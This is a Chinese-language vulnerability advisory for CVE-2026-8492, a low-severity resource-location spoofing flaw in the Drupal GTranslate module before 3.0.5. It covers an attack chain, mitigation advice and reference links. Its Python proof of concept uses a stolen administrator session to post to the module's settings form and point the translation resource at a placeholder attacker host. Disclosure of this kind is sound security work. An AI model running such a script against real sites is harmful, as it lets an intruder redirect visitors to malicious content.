CVE-2026-8492 Drupal GTranslate模块资源位置欺骗漏洞

漏洞信息

漏洞编号

CVE-2026-8492

漏洞类型

修改不可变数据 (MAID) / 资源位置欺骗

CVSS评分

2.7 低危

攻击向量

网络 (AV:N)

认证要求

高权限 (PR:H)

用户交互

无需交互 (UI:N)

影响产品

Translate Drupal with GTranslate

漏洞概述

Drupal的Translate Drupal with GTranslate模块被发现存在一处安全漏洞，被归类为修改不可变数据（MAID）漏洞。该问题允许攻击者进行资源位置欺骗，具体影响范围涵盖了从0.0.0版本开始直到3.0.5之前的所有发行版本。由于模块在处理某些关键配置数据时缺乏足够的完整性校验，拥有高权限的攻击者可以篡改这些本应固定的数据。尽管利用门槛较高（需要高权限），但成功利用后可能导致系统加载非预期的资源，从而对系统的完整性构成一定威胁。建议用户及时关注官方安全公告并采取补救措施。

技术细节

该漏洞的根本原因在于应用程序未能严格区分和保护那些在运行期间不应被修改的“不可变数据”。在Translate Drupal with GTranslate模块的实现逻辑中，用于定位外部翻译资源的URL或路径参数在初始化后被系统默认为可信且固定。然而，由于缺乏针对高权限用户操作的有效二次验证或输入锁定机制，攻击者一旦获得管理员权限，便可以通过构造特定的HTTP POST请求，向模块的配置接口提交精心设计的Payload。具体利用方式是修改指向翻译服务的资源位置参数。当系统更新配置后，原本指向合法GTranslate服务的请求会被重定向至攻击者指定的恶意地址（如钓鱼网站或恶意脚本托管服务器）。虽然CVSS评分显示该漏洞对机密性和可用性无直接影响，且需要高权限才能触发，但其对完整性的破坏可能导致用户被引导至恶意内容，破坏了系统的信任链。

攻击链分析

STEP 1

侦察

攻击者识别目标站点使用了受影响版本的Translate Drupal with GTranslate模块（小于3.0.5）。

STEP 2

权限获取

由于漏洞需要高权限（PR:H），攻击者通过钓鱼、凭证窃取或其他方式获取Drupal管理员账户权限。

STEP 3

漏洞利用

攻击者以管理员身份登录，向后端发送恶意请求，修改Translate Drupal with GTranslate模块中本应不可变的资源定位参数。

STEP 4

资源欺骗

系统加载被篡改后的配置，将用户的翻译请求重定向至攻击者控制的恶意资源位置，实现完整性破坏。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

# Proof of Concept for CVE-2026-8492
# This script demonstrates how a high-privileged user might
# modify the immutable data to spoof the resource location.

import requests

target_url = "http://example.com/admin/config/regional/gtranslate/settings"
# Malicious resource location to spoof the legitimate service
malicious_url = "http://attacker-controlled-site.com/fake-resource"

# Payload attempting to modify the assumed-immutable configuration
payload = {
    "gtranslate_api_key": "",
    "gtranslate_resource_url": malicious_url,
    "form_id": "gtranslate_admin_settings",
    "op": "Save configuration"
}

# Attacker needs to be authenticated with high privileges (PR:H)
cookies = {
    "SESSa1b2c3d4": "valid_admin_session_id_here"
}

headers = {
    "User-Agent": "Mozilla/5.0",
    "Content-Type": "application/x-www-form-urlencoded"
}

try:
    response = requests.post(target_url, data=payload, cookies=cookies, headers=headers)
    if response.status_code == 200 and "Configuration saved" in response.text:
        print("[+] Success: Configuration potentially modified.")
        print(f"[+] Resource location spoofed to: {malicious_url}")
    else:
        print("[-] Failed to modify configuration or invalid response.")
except Exception as e:
    print(f"Error: {e}")

影响范围

Translate Drupal with GTranslate < 3.0.5

防御指南

临时缓解措施

如果无法立即升级，建议暂时禁用Translate Drupal with GTranslate模块，直到应用安全补丁。同时，应审查系统日志以检测是否有针对该模块配置的可疑修改记录。

参考链接

1 CVE https://www.cve.org/CVERecord?id=CVE-2026-8492
2 NVD https://nvd.nist.gov/vuln/detail/CVE-2026-8492
3 Details https://www.cvedetails.com/cve/CVE-2026-8492/
4 VulDB https://vuldb.com/cve/CVE-2026-8492
5 Link https://www.drupal.org/sa-contrib-2026-035